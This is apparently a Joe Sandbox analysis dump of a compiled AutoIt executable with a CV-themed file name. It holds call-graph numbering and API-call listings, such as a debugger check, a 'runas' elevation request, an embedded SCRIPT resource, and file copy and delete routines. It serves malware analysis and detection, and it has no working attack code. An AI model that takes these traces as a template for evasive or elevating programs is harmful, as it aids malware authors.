96085->96086 96086->96088 96088->96083 96089 10fb1c __NMSG_WRITE 96089->96082 96091 c936c 81 API calls 96089->96091 96094 c936c 81 API calls 96090->96094 96107 c936c 81 API calls 96106->96107 96108 11702a 96107->96108 96109 cb470 91 API calls 96108->96109 96111 11703a 96109->96111 96110 11705f 96114 117063 96110->96114 96282 ccdb9 48 API calls 96110->96282 96111->96110 96112 cfe30 335 API calls 96111->96112 96112->96110 96114->95908 96115->95910 96117 11e868 96116->96117 96118 11e84e 96116->96118 96284 11ccdc 48 API calls 96117->96284 96283 10cc5c 86 API calls 4 library calls 96118->96283 96121 11e871 96122 cfe30 334 API calls 96121->96122 96123 11e8cf 96122->96123 96124 11e96a 96123->96124 96125 11e916 96123->96125 96149 11e860 Mailbox 96123->96149 96126 11e9c7 96124->96126 96127 11e978 96124->96127 96285 109b72 48 API calls 96125->96285 96133 c936c 81 API calls 96126->96133 96126->96149 96286 10a69d 48 API calls 96127->96286 96130 11e949 96132 d45e0 334 API calls 96130->96132 96131 11e99b 96287 cbc74 48 API calls 96131->96287 96132->96149 96135 11e9e1 96133->96135 96136 cbdfa 48 API calls 96135->96136 96138 11ea05 CharUpperBuffW 96136->96138 96137 11e9a3 Mailbox 96140 d3200 334 API calls 96137->96140 96139 11ea1f 96138->96139 96141 11ea72 96139->96141 96142 11ea26 96139->96142 96140->96149 96143 c936c 81 API calls 96141->96143 96288 109b72 48 API calls 96142->96288 96144 11ea7a 96143->96144 96289 c1caa 49 API calls 96144->96289 96147 11ea54 96149->95907 96156->95908 96158 106529 96157->96158 96159 106cc4 FindFirstFileW 96157->96159 96158->95908 96159->96158 96160 106cd9 FindClose 96159->96160 96160->96158 96162 c9384 96161->96162 96176 c9380 96161->96176 96163 134cbd __i64tow 96162->96163 96164 c9398 96162->96164 96165 134bbf 96162->96165 96171 c93b0 __itow Mailbox _wcscpy 96162->96171 96245 e172b 80 API calls 4 library calls 96164->96245 96166 134ca5 96165->96166 96167 134bc8 96165->96167 96246 e172b 80 API calls 4 library calls 96166->96246 96167->96171 96172 
134be7 96167->96172 96170 df4ea 48 API calls 96173 c93ba 96170->96173 96171->96170 96174 df4ea 48 API calls 96172->96174 96175 cce19 48 API calls 96173->96175 96173->96176 96178 134c04 96174->96178 96175->96176 96176->96070 96177 df4ea 48 API calls 96179 134c2a 96177->96179 96178->96177 96179->96176 96180 cce19 48 API calls 96179->96180 96180->96176 96242->96067 96243->96089 96245->96171 96246->96171 96282->96114 96283->96149 96284->96121 96285->96130 96286->96131 96287->96137 96288->96147 96292 cbd3f 96291->96292 96295 cbd5a 96291->96295 96293 cbdfa 48 API calls 96292->96293 96294 cbd47 CharUpperBuffW 96293->96294 96294->96295 96295->95929 96297 c2b8b 96296->96297 96298 13436a 96296->96298 96299 df4ea 48 API calls 96297->96299 96300 c2b92 96299->96300 96301 c2bb3 96300->96301 96327 c2bce 48 API calls 96300->96327 96301->95944 96303->95938 96304->95997 96305->95937 96306->95937 96307->95937 96308->95998 96309->95938 96310->95997 96311->95979 96312->95979 96313->95984 96314->95997 96315->95963 96316->95997 96317->95997 96318->95997 96319->95937 96320->95937 96321->95937 96322->95937 96323->95997 96324->95982 96325->95935 96326->95997 96327->96301 96328->96031 96329->96031 96330->96033 96331->96033 96332->96025 96333->96018 96334->96035 96336 c513f __NMSG_WRITE 96335->96336 96337 131b27 96336->96337 96338 c5151 96336->96338 96339 c6b4a 48 API calls 96337->96339 96340 cbb85 48 API calls 96338->96340 96342 131b34 96339->96342 96341 c515e ___crtGetEnvironmentStringsW 96340->96341 96341->94847 96343 dee75 48 API calls 96342->96343 96344 131b57 ___crtGetEnvironmentStringsW 96343->96344 96346 cb392 96345->96346 96353 cb3c5 ___crtGetEnvironmentStringsW 96345->96353 96346->96353 96353->94856 96354->94857 96355 139c06 96366 dd3be 96355->96366 96357 139c1c 96358 139c91 Mailbox 96357->96358 96375 c1caa 49 API calls 96357->96375 96361 d3200 335 API calls 96358->96361 96360 139cc5 96364 13a7ab Mailbox 96360->96364 96377 10cc5c 86 API calls 4 library calls 96360->96377 
96361->96360 96363 139c71 96363->96360 96376 10b171 48 API calls 96363->96376 96367 dd3dc 96366->96367 96368 dd3ca 96366->96368 96370 dd40b 96367->96370 96371 dd3e2 96367->96371 96378 cdcae 50 API calls Mailbox 96368->96378 96379 cdcae 50 API calls Mailbox 96370->96379 96372 df4ea 48 API calls 96371->96372 96374 dd3d4 96372->96374 96374->96357 96375->96363 96376->96358 96377->96364 96378->96374 96379->96374 96380 13197b 96385 ddd94 96380->96385 96384 13198a 96386 df4ea 48 API calls 96385->96386 96387 ddd9c 96386->96387 96388 dddb0 96387->96388 96393 ddf3d 96387->96393 96392 e0f0a 52 API calls __cinit 96388->96392 96392->96384 96394 ddf46 96393->96394 96396 ddda8 96393->96396 96425 e0f0a 52 API calls __cinit 96394->96425 96397 dddc0 96396->96397 96398 cd7f7 48 API calls 96397->96398 96399 dddd7 GetVersionExW 96398->96399 96400 c6a63 48 API calls 96399->96400 96401 dde1a 96400->96401 96426 ddfb4 96401->96426 96404 c6571 48 API calls 96412 dde2e 96404->96412 96406 1324c8 96408 ddea4 GetCurrentProcess 96439 ddf5f LoadLibraryA GetProcAddress 96408->96439 96410 ddf31 GetSystemInfo 96414 ddf0e 96410->96414 96411 ddee3 96433 de00c 96411->96433 96412->96406 96430 ddf77 96412->96430 96413 ddebb 96413->96410 96413->96411 96417 ddf1c FreeLibrary 96414->96417 96418 ddf21 96414->96418 96417->96418 96418->96388 96419 ddf29 GetSystemInfo 96421 ddf03 96419->96421 96420 ddef9 96436 ddff4 96420->96436 96421->96414 96424 ddf09 FreeLibrary 96421->96424 96424->96414 96425->96396 96427 ddfbd 96426->96427 96428 cb18b 48 API calls 96427->96428 96429 dde22 96428->96429 96429->96404 96440 ddf89 96430->96440 96444 de01e 96433->96444 96437 de00c 2 API calls 96436->96437 96438 ddf01 GetNativeSystemInfo 96437->96438 96438->96421 96439->96413 96441 ddea0 96440->96441 96442 ddf92 LoadLibraryA 96440->96442 96441->96408 96441->96413 96442->96441 96443 ddfa3 GetProcAddress 96442->96443 96443->96441 96445 ddef1 96444->96445 96446 de027 LoadLibraryA 96444->96446 96445->96419 96445->96420 96446->96445 
96447 de038 GetProcAddress 96446->96447 96447->96445 96448 1319cb 96453 c2322 96448->96453 96450 1319d1 96486 e0f0a 52 API calls __cinit 96450->96486 96452 1319db 96454 c2344 96453->96454 96487 c26df 96454->96487 96459 cd7f7 48 API calls 96460 c2384 96459->96460 96461 cd7f7 48 API calls 96460->96461 96462 c238e 96461->96462 96463 cd7f7 48 API calls 96462->96463 96464 c2398 96463->96464 96465 cd7f7 48 API calls 96464->96465 96466 c23de 96465->96466 96467 cd7f7 48 API calls 96466->96467 96468 c24c1 96467->96468 96495 c263f 96468->96495 96472 c24f1 96473 cd7f7 48 API calls 96472->96473 96474 c24fb 96473->96474 96524 c2745 96474->96524 96476 c2546 96477 c2556 GetStdHandle 96476->96477 96478 c25b1 96477->96478 96479 13501d 96477->96479 96480 c25b7 CoInitialize 96478->96480 96479->96478 96481 135026 96479->96481 96480->96450 96531 1092d4 53 API calls 96481->96531 96483 13502d 96532 1099f9 CreateThread 96483->96532 96485 135039 CloseHandle 96485->96480 96486->96452 96533 c2854 96487->96533 96490 c6a63 48 API calls 96491 c234a 96490->96491 96492 c272e 96491->96492 96547 c27ec 6 API calls 96492->96547 96494 c237a 96494->96459 96496 cd7f7 48 API calls 96495->96496 96497 c264f 96496->96497 96498 cd7f7 48 API calls 96497->96498 96499 c2657 96498->96499 96548 c26a7 96499->96548 96502 c26a7 48 API calls 96503 c2667 96502->96503 96504 cd7f7 48 API calls 96503->96504 96505 c2672 96504->96505 96506 df4ea 48 API calls 96505->96506 96507 c24cb 96506->96507 96508 c22a4 96507->96508 96509 c22b2 96508->96509 96510 cd7f7 48 API calls 96509->96510 96511 c22bd 96510->96511 96512 cd7f7 48 API calls 96511->96512 96513 c22c8 96512->96513 96514 cd7f7 48 API calls 96513->96514 96515 c22d3 96514->96515 96516 cd7f7 48 API calls 96515->96516 96517 c22de 96516->96517 96518 c26a7 48 API calls 96517->96518 96519 c22e9 96518->96519 96520 df4ea 48 API calls 96519->96520 96521 c22f0 96520->96521 96522 131fe7 96521->96522 96523 c22f9 RegisterWindowMessageW 96521->96523 96523->96472 96525 c2755 

                                                                                            Control-flow Graph

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 32d3e0e76d9b7126ae57ce52907bc55ff9aa0719b48ae14b9dfa22f444ed3092
                                                                                            • Instruction ID: 72550318e499be5d08242ffc76affbbb1b180c5dda67f830a81c3cd418bea42f
                                                                                            • Opcode Fuzzy Hash: 32d3e0e76d9b7126ae57ce52907bc55ff9aa0719b48ae14b9dfa22f444ed3092
                                                                                            • Instruction Fuzzy Hash: FA324B75B022A88FDB258F15DD816EAB7F5FF4A310F1841D9E40AA7A91D7309E80CF52

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,000C3AA3,?), ref: 000C3D45
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,000C3AA3,?), ref: 000C3D57
                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00181148,00181130,?,?,?,?,000C3AA3,?), ref: 000C3DC8
                                                                                              • Part of subcall function 000C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000C3DEE,00181148,?,?,?,?,?,000C3AA3,?), ref: 000C6471
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,000C3AA3,?), ref: 000C3E48
                                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001728F4,00000010), ref: 00131CCE
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00181148,?,?,?,?,?,000C3AA3,?), ref: 00131D06
                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0015DAB4,00181148,?,?,?,?,?,000C3AA3,?), ref: 00131D89
                                                                                            • ShellExecuteW.SHELL32(00000000,?,?,?,?,000C3AA3), ref: 00131D90
                                                                                              • Part of subcall function 000C3E6E: GetSysColorBrush.USER32(0000000F), ref: 000C3E79
                                                                                              • Part of subcall function 000C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 000C3E88
                                                                                              • Part of subcall function 000C3E6E: LoadIconW.USER32(00000063), ref: 000C3E9E
                                                                                              • Part of subcall function 000C3E6E: LoadIconW.USER32(000000A4), ref: 000C3EB0
                                                                                              • Part of subcall function 000C3E6E: LoadIconW.USER32(000000A2), ref: 000C3EC2
                                                                                              • Part of subcall function 000C3E6E: RegisterClassExW.USER32(?), ref: 000C3F30
                                                                                              • Part of subcall function 000C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C36E6
                                                                                              • Part of subcall function 000C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3707
                                                                                              • Part of subcall function 000C36B8: ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C371B
                                                                                              • Part of subcall function 000C36B8: ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C3724
                                                                                              • Part of subcall function 000C4FFC: _memset.LIBCMT ref: 000C5022
                                                                                              • Part of subcall function 000C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C50CB
                                                                                            Strings
                                                                                            • runas, xrefs: 00131D84
                                                                                            • This is a third-party compiled AutoIt script., xrefs: 00131CC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                            • API String ID: 438480954-3287110873
                                                                                            • Opcode ID: ab9176667f4463e6bb0367b1dc6a206b7f604bf8d31c586d0a5cb87347c8070a
                                                                                            • Instruction ID: a0efe85682f0a105915f3abbd13ca307f85afe728bba475a772b6ce1c910b861
                                                                                            • Opcode Fuzzy Hash: ab9176667f4463e6bb0367b1dc6a206b7f604bf8d31c586d0a5cb87347c8070a
                                                                                            • Instruction Fuzzy Hash: ED51D535A04249BADF11ABF0DC49FED7BB9AB16B44F04806DF601621E3DB745B86CB21

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 000DDDEC
                                                                                            • GetCurrentProcess.KERNEL32(00000000,0015DC38,?,?), ref: 000DDEAC
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,0015DC38,?,?), ref: 000DDF01
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 000DDF0C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 000DDF1F
                                                                                            • GetSystemInfo.KERNEL32(?,0015DC38,?,?), ref: 000DDF29
                                                                                            • GetSystemInfo.KERNEL32(?,0015DC38,?,?), ref: 000DDF35
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                            • String ID:
                                                                                            • API String ID: 3851250370-0
                                                                                            • Opcode ID: cad0459f48a10ee20df232efc5ff0cd5f749fefa86414f9b2f88e842a24e4a1b
                                                                                            • Instruction ID: 3e300dabf48253166e01689f97da42f9dc83ff6617b46ab82f6e8b238810f398
                                                                                            • Opcode Fuzzy Hash: cad0459f48a10ee20df232efc5ff0cd5f749fefa86414f9b2f88e842a24e4a1b
                                                                                            • Instruction Fuzzy Hash: BB619DB180A384DBCF25DF6898C15ED7FA4AF2A300F1989EAD8459F307C6348949CB65

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000C449E,?,?,00000000,00000001), ref: 000C407B
                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000C449E,?,?,00000000,00000001), ref: 000C4092
                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,000C449E,?,?,00000000,00000001,?,?,?,?,?,?,000C41FB), ref: 00134F1A
                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,000C449E,?,?,00000000,00000001,?,?,?,?,?,?,000C41FB), ref: 00134F2F
                                                                                            • LockResource.KERNEL32(000C449E,?,?,000C449E,?,?,00000000,00000001,?,?,?,?,?,?,000C41FB,00000000), ref: 00134F42
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Similarity
                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                            • String ID: SCRIPT
                                                                                            • API String ID: 3051347437-3967369404
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00132F49), ref: 00106CB9
                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00106CCA
                                                                                            • FindClose.KERNEL32(00000000), ref: 00106CDA
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                            • String ID:
                                                                                            • API String ID: 48322524-0
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                            • String ID: @
                                                                                            • API String ID: 3728558374-2766056989
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper
                                                                                            • String ID:
                                                                                            • API String ID: 3964851224-0
                                                                                            APIs
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CE959
                                                                                            • timeGetTime.WINMM ref: 000CEBFA
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CED2E
                                                                                            • TranslateMessage.USER32(?), ref: 000CED3F
                                                                                            • DispatchMessageW.USER32(?), ref: 000CED4A
                                                                                            • LockWindowUpdate.USER32(00000000), ref: 000CED79
                                                                                            • DestroyWindow.USER32 ref: 000CED85
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000CED9F
                                                                                            • Sleep.KERNEL32(0000000A), ref: 00135270
                                                                                            • TranslateMessage.USER32(?), ref: 001359F7
                                                                                            • DispatchMessageW.USER32(?), ref: 00135A05
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00135A19
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                            • API String ID: 2641332412-570651680
                                                                                            APIs
                                                                                            • ___createFile.LIBCMT ref: 000F5EC3
                                                                                            • ___createFile.LIBCMT ref: 000F5F04
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000F5F2D
                                                                                            • __dosmaperr.LIBCMT ref: 000F5F34
                                                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 000F5F47
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000F5F6A
                                                                                            • __dosmaperr.LIBCMT ref: 000F5F73
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000F5F7C
                                                                                            • __set_osfhnd.LIBCMT ref: 000F5FAC
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F6016
                                                                                            • __close_nolock.LIBCMT ref: 000F603C
                                                                                            • __chsize_nolock.LIBCMT ref: 000F606C
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F607E
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F6176
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F618B
                                                                                            • __close_nolock.LIBCMT ref: 000F61EB
                                                                                              • Part of subcall function 000EEA9C: CloseHandle.KERNELBASE(00000000,0016EEF4,00000000,?,000F6041,0016EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000EEAEC
                                                                                              • Part of subcall function 000EEA9C: GetLastError.KERNEL32(?,000F6041,0016EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000EEAF6
                                                                                              • Part of subcall function 000EEA9C: __free_osfhnd.LIBCMT ref: 000EEB03
                                                                                              • Part of subcall function 000EEA9C: __dosmaperr.LIBCMT ref: 000EEB25
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F620D
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000F6342
                                                                                            • ___createFile.LIBCMT ref: 000F6361
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000F636E
                                                                                            • __dosmaperr.LIBCMT ref: 000F6375
                                                                                            • __free_osfhnd.LIBCMT ref: 000F6395
                                                                                            • __invoke_watson.LIBCMT ref: 000F63C3
                                                                                            • __wsopen_helper.LIBCMT ref: 000F63DD
                                                                                            Similarity
                                                                                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                            • String ID: @
                                                                                            • API String ID: 3896587723-2766056989

                                                                                            APIs
                                                                                            • _wcscpy.LIBCMT ref: 0010FA96
                                                                                            • _wcschr.LIBCMT ref: 0010FAA4
                                                                                            • _wcscpy.LIBCMT ref: 0010FABB
                                                                                            • _wcscat.LIBCMT ref: 0010FACA
                                                                                            • _wcscat.LIBCMT ref: 0010FAE8
                                                                                            • _wcscpy.LIBCMT ref: 0010FB09
                                                                                            • __wsplitpath.LIBCMT ref: 0010FBE6
                                                                                            • _wcscpy.LIBCMT ref: 0010FC0B
                                                                                            • _wcscpy.LIBCMT ref: 0010FC1D
                                                                                            • _wcscpy.LIBCMT ref: 0010FC32
                                                                                            • _wcscat.LIBCMT ref: 0010FC47
                                                                                            • _wcscat.LIBCMT ref: 0010FC59
                                                                                            • _wcscat.LIBCMT ref: 0010FC6E
                                                                                              • Part of subcall function 0010BFA4: _wcscmp.LIBCMT ref: 0010C03E
                                                                                              • Part of subcall function 0010BFA4: __wsplitpath.LIBCMT ref: 0010C083
                                                                                              • Part of subcall function 0010BFA4: _wcscpy.LIBCMT ref: 0010C096
                                                                                              • Part of subcall function 0010BFA4: _wcscat.LIBCMT ref: 0010C0A9
                                                                                              • Part of subcall function 0010BFA4: __wsplitpath.LIBCMT ref: 0010C0CE
                                                                                              • Part of subcall function 0010BFA4: _wcscat.LIBCMT ref: 0010C0E4
                                                                                              • Part of subcall function 0010BFA4: _wcscat.LIBCMT ref: 0010C0F7
                                                                                            Similarity
                                                                                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                                            • API String ID: 2955681530-2806939583

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 000C3F86
                                                                                            • RegisterClassExW.USER32(00000030), ref: 000C3FB0
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C3FC1
                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 000C3FDE
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C3FEE
                                                                                            • LoadIconW.USER32(000000A9), ref: 000C4004
                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C4013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                            • API String ID: 2914291525-1005189915

                                                                                            APIs
                                                                                              • Part of subcall function 0010BDB4: __time64.LIBCMT ref: 0010BDBE
                                                                                              • Part of subcall function 000C4517: _fseek.LIBCMT ref: 000C452F
                                                                                            • __wsplitpath.LIBCMT ref: 0010C083
                                                                                              • Part of subcall function 000E1DFC: __wsplitpath_helper.LIBCMT ref: 000E1E3C
                                                                                            • _wcscpy.LIBCMT ref: 0010C096
                                                                                            • _wcscat.LIBCMT ref: 0010C0A9
                                                                                            • __wsplitpath.LIBCMT ref: 0010C0CE
                                                                                            • _wcscat.LIBCMT ref: 0010C0E4
                                                                                            • _wcscat.LIBCMT ref: 0010C0F7
                                                                                            • _wcscmp.LIBCMT ref: 0010C03E
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C65D
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C670
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0010C2A1
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0010C338
                                                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0010C34E
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010C35F
                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010C371
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2378138488-0

                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 000C37B3
                                                                                            • KillTimer.USER32(?,00000001), ref: 000C37DD
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C3800
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C380B
                                                                                            • CreatePopupMenu.USER32 ref: 000C381F
                                                                                            • PostQuitMessage.USER32(00000000), ref: 000C382E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
